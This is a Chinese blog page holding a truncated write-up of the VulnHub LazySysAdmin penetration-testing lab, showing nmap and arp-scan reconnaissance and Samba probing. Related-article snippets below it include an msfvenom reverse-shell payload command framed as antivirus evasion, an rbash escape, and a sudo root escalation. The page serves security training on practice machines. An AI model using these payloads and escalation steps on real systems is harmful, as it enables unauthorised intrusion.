vulnhub靶机渗透 LazysysAdmin

最新推荐文章于 2024-08-05 19:51:01 发布
原创 最新推荐文章于 2024-08-05 19:51:01 发布 · 266 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #渗透测试 #vllnhub

本文详细记录了对Lazysysadmin靶机的入侵过程,从环境搭建到信息收集,包括使用nmap和arp-scan发现靶机IP和开放端口,通过enum4linux工具探测samba服务,发现空密码漏洞。接着,利用wordpress和phpmyadmin的账号密码登录,尝试权限提升,最终通过两种方法获取root权限,包括利用系统内核信息进行提权。

LazysysAdmin靶机入侵笔记

1、环境搭建

下载地址:https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip

​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。

2、信息收集

  • 主机发现

    使用nmap进行主机探测(-sP参数也可):nmap -sn 192.168.110.1/24

    (图片丢了········)

    192.168.110.128,为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.110.1/24

  • 端口扫描

    使用nmap扫描端口,并做服务识别和深度扫描(加-A参数):nmap -p- -A 192.168.110.128
    在这里插入图片描述
    开放了22、80、139、445、3306、6667端口

3、漏洞探测

  • samba服务探测

    一般此类靶机开启了samba服务则很可能会泄露一些关键信息,且靶机介绍说这是一个懒惰的管理员
    在这里插入图片描述

    懒惰的管理员一般都会把密码等信息记录下来,方便管理各种系统。现实生活中也是有这种情况存在。

    因此通过探测samb

最低0.47元/天 解锁文章
记一次学习--内网穿透
banliyaoguai的博客
09-08 2127
设置代理,这里的代理就是你在proxychain中设置的代理,你选的那个版本就要那个版本,刚刚在代理中选的是sock 4a所以这里就选4a。现在创建的代理是kali的1080端口,这个就相当于我们只要连接本地的1080端口就连接到了msf上面,然后就可以走到116的那个网段。首先查看网站,这里是thinkphp5.0的版本,说不定会有对应的漏洞。添加路由,这里由于现在的会话连接的是ubuntu,所以现在是可以通过会话建立到达116的路由的。r=admin,进入了cms的后台,在这里可以尝试以下密码爆破。
Lazysysadmin靶机笔记
LINGX5的博客
08-10 1788
我们显示用nmap扫描发现目标开放了22,80,139,445等端口的服务,根据优先级,优先选择web的端口通过漏洞脚本的扫描我们发现了一些web的路径,通过一个一个的访问,我们发现了一个可能的用户名togie,以及wordpress和phpmyadmin的登陆框我们利用smb服务发现了togie用户的密码,以及wp的用户名和密码。通过ssh或者wp的反弹shell,成功获得立足点利用sudo /bin/bash 命令进行提权到root,拿到flagproof.txt文件ds,
Vulnhub靶机joker
weixin_53507480的博客
12-13 672
vulhub靶机joker黑盒渗透
vulnhub】presidential1
开心星人的博客
07-06 1001
因为靶机是host-only模式 我们将kali也设置为host-only模式 主机号太大或太小的丢掉,因为可能是网关之类的 所以靶机ip为192.168.110.128 看到有人名相关信息,之后可能需要用cwel assets目录,先看下 网站源码,看看有没有扫描敏感文件,感觉没有发现什么敏感文件cgi-bin目录403 访问一下config.php,确实有这个文件,但是为空 然后尝试会不会是备份文件config.phps 、config.php.bak 访问icons/README突然对di
windows系统搭建FTP服务器
qq_51331767的博客
01-09 4990
Windows快速搭建FTP服务器
[VulnHub靶机渗透]三:Lazysysadmin
qq_45927819的博客
03-08 3370
文章目录一、实验环境二、信息收集三、渗透测试1. 22端口(ssh爆破)2. 80端口phpmyadmin入手: 一、实验环境 kali:192.168.56.104 扫描同一网段,探测主机: nmap -sP 192.168.56.0/24 这就好办了,确定靶机ip为192.168.56.103 二、信息收集 扫描端口: nmap -sS -Pn -T4 -sV -O 192.168.56.103 所得到的信息: OS: Linux 3.2 - 4.9(Ubuntu) 22端口: ssh——OpenS
Vulnhub靶场渗透LazySysAdmin
paidx0
09-11 485
靶机说明 目标读取 root下的 flag文件 靶机 ip(192.168.110.128) 攻击机 ip(192.168.110.127) 信息收集 nmap 扫端口,注意 22端口(ssh), 139端口(samba) 扫目录 发现文章用的 WordPress,用 wpscan扫一下有啥漏洞,找到这两个链接会下载两个文件 打开发现重要信息,猜测用户就是togie Samba服务 用 enum4linux 扫一下Samba服务,发现用户密码可以是空,可以直接连接 然后就是挨个查看文件了,查
VulnHub靶机渗透】二:Lazysysadmin
野原新之助
03-30 1428
靶机设定了一些不安全的配置以及弱口令,导致重要文件泄漏。本次通过对发现的端口服务,逐一进行渗透提权测试来学习该靶机
VulnhubLazysysadmin靶场
ierciyuan的博客
10-18 2120
Lazysysadmin靶场实战,ssh弱口令+提权,成功拿到flag
VulnHubLazySysAdmin 题目详解
hl1293348082的专栏
03-27 178
环境下载 文件名:Lazysysadmin.zip (Size: 479 MB) Download: https://drive.google.com/uc?id=0B_A-fCfoBmkLOXN5Y1ZmZnpDQTQ&export=download Download (Mirror): https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip Download (Torrent): https://downl
Lazysysadmin 靶场.zip
12-22
Lazysysadmin 靶场.zip
Lazysysadmin靶机渗透测试
weixin_58786230的博客
08-05 401
【代码】Lazysysadmin靶机渗透测试
双主复制
weixin_34367257的博客
05-12 146
例、主库192.168.110.128,从库192.168.110.130 master: (1)、在主库上设置一个复制使用的账户并授予replication slave权限。 MariaDB [(none)]> grant replication slave on *.*...
vulnhub breach1.0
dfhjlll的博客
02-11 551
下载breach 1.0,直接打开 breach 1.0的ip是192.168.110.140,需要将虚拟机网卡设置为nat 物理机上设置网络vmnet的ipv4地址为192.168.110.220
大数据组件及其环境搭建
qq_35200444的博客
07-04 1024
说明:该搭建文档是实践流程,是我当初刚入门时的安装文档,如果想快速搭建环境/快速开时业务开发,可以参考。不过现在很多公司要么直接购买大数据组件云服务,要么基于ambera等搭建/管理大数据集群环境,要么基于k8s、rancher等基于容器技术实现大数据集群环境。 这里只发布了部分大数据组件的部署安装流程,后面还有不定期更新 spark、flink、flume、redis、mongo、amb...
linux源码免杀,免杀shellcode 2020/11/29 VirtualAlloc&HeapAlloc
weixin_33761747的博客
05-12 382
编译环境VS2019Kali Linux 2020.3VirusTotal 检测运行截图食用步骤1、msfvenom生成shellcoderoot@kali:~/Desktop# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.110.128 LPORT=4444 -f raw -o shell.png2、编译可执行文件Virtu...
服务器之间ssh免密钥登录
厚积薄发的博客
01-26 447
1.生成公钥和私钥 ssh-keygen -t rsa 2. copy公钥到指定机器上 vim /etc/hosts 192.168.110.128 hadoop102 192.168.110.130 hadoop103 192.168.110.131 hadoop104 ssh-copy-id -i /root/.ssh/id_rsa.pub root@192.168.110.131 ...
OSCP - Lazysysadmin 的破解
kevinhanser
08-24 3414
本文主要记录对 Lazysysadmin渗透学习过程 Lazysysadmin 下载链接 1. ip 探测 ip 探测 使用 netdiscover,由于在内网,可以直接扫网网段 root@kali:~# netdiscover -r 10.10.10.0/24 Currently scanning: Finished! | Screen View: ...
渗透测试靶机练习(一)之lazysysadmin
习惯积淀的博客
04-08 1470
lzaysysadmin 情报搜集 主机发现,使用netdiscover 主机扫描,使用nmap 使用dirbuster进行网站目录扫描 可以看到扫描结果,有workpress和phpmyadmin 登录网站,查看robots.txt文件 存在目录遍历漏洞,但是没有发现可用信息 可以尝试爆破一下phpmyadmin的登录口令和wpscan扫描一下 主机...
vulnhub靶机渗透测试教学
最新发布
01-11
### VulnHub靶机渗透测试教程 #### 了解目标环境 对于VulnHub上的DC-1靶机,攻击者通常会设置在一个特定的网络环境中。例如,在此案例中,攻击者的Kali Linux机器位于`192.168.189.148`而Ubuntu靶机则处于同一子网内的`192.168.189.172`地址上[^1]。 #### 工具准备与初步侦查 为了有效地执行信息收集阶段的工作,可以利用像fscan这样的工具来进行全面的安全评估。这款软件不仅能够检测在线主机并枚举开放端口,还具备针对多种协议和服务实施暴力破解的能力,从而帮助识别潜在弱点[^3]。 #### 利用已知漏洞或配置错误 当面对存在不安全配置或是默认凭证薄弱的目标时,可以直接尝试登录相关服务以获取进一步访问权限。比如这里提到的一个SSH账户其用户名为`mkelepce`且对应的密码是`mklpc-osas112`[^4]。 #### 应对受限Shell的情况 如果遭遇到了受限制版本bash解释器(`rbash`)所带来的障碍,则可通过定义新的环境变量方式来实现突破。具体做法是在当前session里添加如下命令:`BASH_CMDS[a]=/bin/sh;a /bin/bash`,这将允许用户获得完全交互式的shell体验[^5]。 ```bash export BASH_CMDS[a]=/bin/sh a=/bin/bash ``` 通过上述方法论的学习和实践,读者可以获得有关如何规划一次成功的渗透测试流程的知识框架,并掌握必要的技术手段去克服过程中可能遇到的各种挑战。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值